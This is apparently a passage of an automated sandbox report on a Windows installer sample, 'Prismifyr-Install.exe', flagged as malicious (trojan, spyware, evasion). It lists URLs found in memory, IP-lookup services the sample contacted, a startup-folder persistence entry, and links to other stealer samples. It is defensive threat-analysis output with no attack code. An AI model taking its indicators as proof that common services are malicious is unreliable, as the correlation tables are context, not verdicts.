                                                      https://tools.ietf.org/html/rfc7230#section-3.2.2Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                        unknown
                                                        https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.67582200182.0000026AF4E93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.67568805952.0000026AE6364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.67582200182.0000026AF4FD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.67738685446.00000233EB1A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://github.com/nodejs/node/commit/f7620fb96d339f704932f9bb9a0dceb9952df2d4Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                            unknown
                                                            https://www.ecma-international.org/ecma-262/8.0/#prod-ClassAtomPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                              unknown
                                                              https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-AssertionPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                unknown
                                                                https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/repairES5.jsPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                  unknown
                                                                  https://tc39.github.io/ecma262/#sec-%iteratorprototype%-objectPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://url.spec.whatwg.org/#concept-urlencoded-serializerPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://wiki.squid-cache.org/SquidFaq/InnerWorkings#What_is_a_half-closed_filedescriptor.3FPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                        unknown
                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.67568805952.0000026AE4E21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://nodejs.org/api/fs.htmlPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://github.com/nodejs/node/pull/21313Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                              unknown
                                                                              https://www.ecma-international.org/ecma-262/8.0/#prod-ClassRangesPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                unknown
                                                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.67568805952.0000026AE504C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://github.com/mysticatea/abort-controllerPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.67568805952.0000026AE504C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      https://www.ecma-international.org/ecma-262/8.0/#prod-NonemptyClassRangesPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                        unknown
                                                                                        http://www.midnight-commander.org/browser/lib/tty/key.cPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                          unknown
                                                                                          https://nodejs.org/Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                            unknown
                                                                                            https://tools.ietf.org/html/rfc7540#section-8.1.2.5Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                              unknown
                                                                                              https://www.ecma-international.org/ecma-262/8.0/#prod-ControlEscapePrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                unknown
                                                                                                https://www.ecma-international.org/ecma-262/8.0/#prod-Hex4DigitsPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                  unknown
                                                                                                  http://www.squid-cache.org/Doc/config/half_closed_clients/Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                    unknown
                                                                                                    https://contoso.com/Iconpowershell.exe, 00000019.00000002.67738685446.00000233EB1A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      https://www.ecma-international.org/ecma-262/8.0/#prod-DecimalEscapePrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                        unknown
                                                                                                        https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ClassControlLetterPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                          unknown
                                                                                                          https://stackoverflow.com/a/5501711/3561Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                            unknown
                                                                                                            https://github.com/nodejs/node/pull/33661Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              https://github.com/heycam/webidl/pull/946.Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                https://github.com/nodejs/node/issues/35452Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  https://www.ecma-international.org/ecma-262/8.0/#prod-CharacterClassEscapePrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                    unknown
                                                                                                                    http://narwhaljs.org)Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                      unknown
                                                                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.67568805952.0000026AE504C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        https://github.com/WICG/scheduling-apisPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                          unknown
                                                                                                                          https://www.ecma-international.org/ecma-262/#sec-promise.allPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://code.google.com/p/chromium/issues/detail?id=25916Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              http://www.apache.org/licenses/LICENSE-2.0.htmlXzpowershell.exe, 00000004.00000002.67568805952.0000026AE504C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                https://fetch.spec.whatwg.org/#fetch-timing-infoPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  https://github.com/tc39/proposal-iterator-helpers/issues/169Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    https://v8.dev/blog/v8-release-89Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      https://webassembly.github.io/spec/web-apiPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        https://github.com/nodejs/node/issues/39707Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          https://github.com/nodejs/node/pull/12607Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            https://tc39.es/ecma262/#sec-IsHTMLDDA-internal-slotPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              https://www.ecma-international.org/ecma-262/#sec-line-terminatorsPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                https://www.unicode.org/Public/UNIDATA/EastAsianWidth.txtPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://www.ecma-international.org/ecma-262/8.0/#prod-PatternPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    http://pesterbdd.com/images/Pester.pngXzpowershell.exe, 00000004.00000002.67568805952.0000026AE504C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      https://sourcemaps.info/spec.htmlPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        https://github.com/nodejs/node/pull/12342Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          https://github.com/nodejs/node/issues/39758Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            https://github.com/nodejs/node/pull/34375Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ExtendedAtomPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                https://github.com/nodejs/node/pull/34010Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  https://heycam.github.io/webidl/#dfn-default-iterator-objectPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    https://heycam.github.io/webidl/#es-iterable-entriesPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      https://heycam.github.io/webidl/#es-interfacesPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        https://html.spec.whatwg.org/multipage/browsers.html#concept-origin-opaquePrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          https://github.com/da-x/rxvt-unicode/tree/v9.22-with-24bit-colorPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            https://github.com/nodejs/node/issuesPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              https://www.ecma-international.org/ecma-262/8.0/#prod-HexDigitsPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                https://github.com/addaleax/eventemitter-asyncresourcePrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://tc39.github.io/ecma262/#sec-object.prototype.tostringPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://url.spec.whatwg.org/#urlsearchparamsPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://infra.spec.whatwg.org/#ascii-whitespacePrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://github.com/chalk/supports-colorPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          https://heycam.github.io/webidl/#ReplaceablePrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://github.com/nodejs/node/pull/30380#issuecomment-552948364Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              https://html.spec.whatwg.org/multipage/timers-and-user-prompts.html#dom-setintervalPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://heycam.github.io/webidl/#dfn-class-stringPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  https://heycam.github.io/webidl/#dfn-iterator-prototype-objectPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://nodejs.org/api/cli.html#cli_unhandled_rejections_mode).Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://www.ecma-international.org/ecma-262/8.0/#prod-ControlLetterPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://www.ecma-international.org/ecma-262/8.0/#prod-QuantifierPrismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          https://github.com/nodejs/node/pull/38614)Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            https://github.com/nodejs/node/issues/10673Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://github.com/acornjs/acorn/issues/575Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://github.com/nodejs/node/pull/33515.Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                                                  • 75% < No. of IPs
                                                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                  104.26.13.205
                                                                                                                                                                                                                  api.ipify.orgUnited States
                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                  34.160.111.145
                                                                                                                                                                                                                  www.myexternalip.comUnited States
                                                                                                                                                                                                                  2686ATGS-MMD-ASUSfalse
                                                                                                                                                                                                                  172.67.74.152
                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                  Analysis ID:1523536
                                                                                                                                                                                                                  Start date and time:2024-10-01 18:19:55 +02:00
                                                                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                  Overall analysis duration:0h 14m 1s
                                                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                  Report type:full
                                                                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                                                                  Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                                                                                                                                  Run name:Suspected VM Detection
                                                                                                                                                                                                                  Number of analysed new started processes analysed:79
                                                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                                                                  Technologies:
                                                                                                                                                                                                                  • HCA enabled
                                                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                                                                  Sample name:Prismifyr-Install.exe
                                                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                                                  Classification:mal72.troj.adwa.spyw.expl.evad.winEXE@148/106@3/3
                                                                                                                                                                                                                  EGA Information:
                                                                                                                                                                                                                  • Successful, ratio: 50%
                                                                                                                                                                                                                  HCA Information:
                                                                                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                                                                                  • Number of executed functions: 20
                                                                                                                                                                                                                  • Number of non-executed functions: 0
                                                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe
                                                                                                                                                                                                                  • Execution Graph export aborted for target mshta.exe, PID 8120 because there are no executed function
                                                                                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 2448 because it is empty
                                                                                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 3564 because it is empty
                                                                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                  • VT rate limit hit for: Prismifyr-Install.exe
                                                                                                                                                                                                                  TimeTypeDescription
                                                                                                                                                                                                                  12:22:07API Interceptor45x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                  12:22:11API Interceptor6x Sleep call for process: WMIC.exe modified
                                                                                                                                                                                                                  18:22:47AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exe
                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                  104.26.13.205file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                                                                  • api.ipify.org/
                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                  • api.ipify.org/
                                                                                                                                                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • api.ipify.org/
                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                  • api.ipify.org/
                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                  • api.ipify.org/
                                                                                                                                                                                                                  SecuriteInfo.com.Win64.Evo-gen.13899.14592.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • api.ipify.org/
                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                                  • api.ipify.org/
                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                  • api.ipify.org/
                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                  • api.ipify.org/
                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                  • api.ipify.org/
                                                                                                                                                                                                                  34.160.111.145SecuriteInfo.com.Variant.Fragtor.599953.20231.7803.exeGet hashmaliciousDarkGate, MailPassViewBrowse
                                                                                                                                                                                                                  • myexternalip.com/raw
                                                                                                                                                                                                                  mek_n_bat.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • ifconfig.me/ip
                                                                                                                                                                                                                  dtyb0ut8vVGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • ifconfig.me/
                                                                                                                                                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • /
                                                                                                                                                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • /
                                                                                                                                                                                                                  L9ck4BoFjc.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • ifconfig.me/
                                                                                                                                                                                                                  a3d1ef821849f015365076467994986ebf47905ffcc4f16761d222e1155abd10ba229aa11e70694c70523e9cbfd0eba5.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • ifconfig.me/ip
                                                                                                                                                                                                                  a3d1ef821849f015365076467994986ebf47905ffcc4f16761d222e1155abd10ba229aa11e70694c70523e9cbfd0eba5.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • ifconfig.me/ip
                                                                                                                                                                                                                  6XAaqIWeJt.jarGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • myexternalip.com/raw
                                                                                                                                                                                                                  6XAaqIWeJt.jarGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • myexternalip.com/raw
                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                  www.myexternalip.comFacturation.exeGet hashmaliciousDoeneriumBrowse
                                                                                                                                                                                                                  • 34.160.111.145
                                                                                                                                                                                                                  Facturation.exeGet hashmaliciousDoeneriumBrowse
                                                                                                                                                                                                                  • 34.160.111.145
                                                                                                                                                                                                                  SecuriteInfo.com.Win64.Evo-gen.28044.10443.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 34.160.111.145
                                                                                                                                                                                                                  SecuriteInfo.com.Win64.Evo-gen.28044.10443.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 34.160.111.145
                                                                                                                                                                                                                  SecuriteInfo.com.Trojan.Win64.Agent.14415.19839.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 34.117.118.44
                                                                                                                                                                                                                  SecuriteInfo.com.Trojan.Win64.Agent.14415.19839.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 34.117.118.44
                                                                                                                                                                                                                  V93MfAY8Ru.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 34.117.118.44
                                                                                                                                                                                                                  V93MfAY8Ru.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 34.117.118.44
                                                                                                                                                                                                                  stub.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 34.117.118.44
                                                                                                                                                                                                                  stub.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 34.117.118.44
                                                                                                                                                                                                                  api.ipify.orgELECTRONIC RECEIPT_Opcsa.htmlGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                                                                                                                                                  • 172.67.74.152
                                                                                                                                                                                                                  grace.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                  • 104.26.13.205
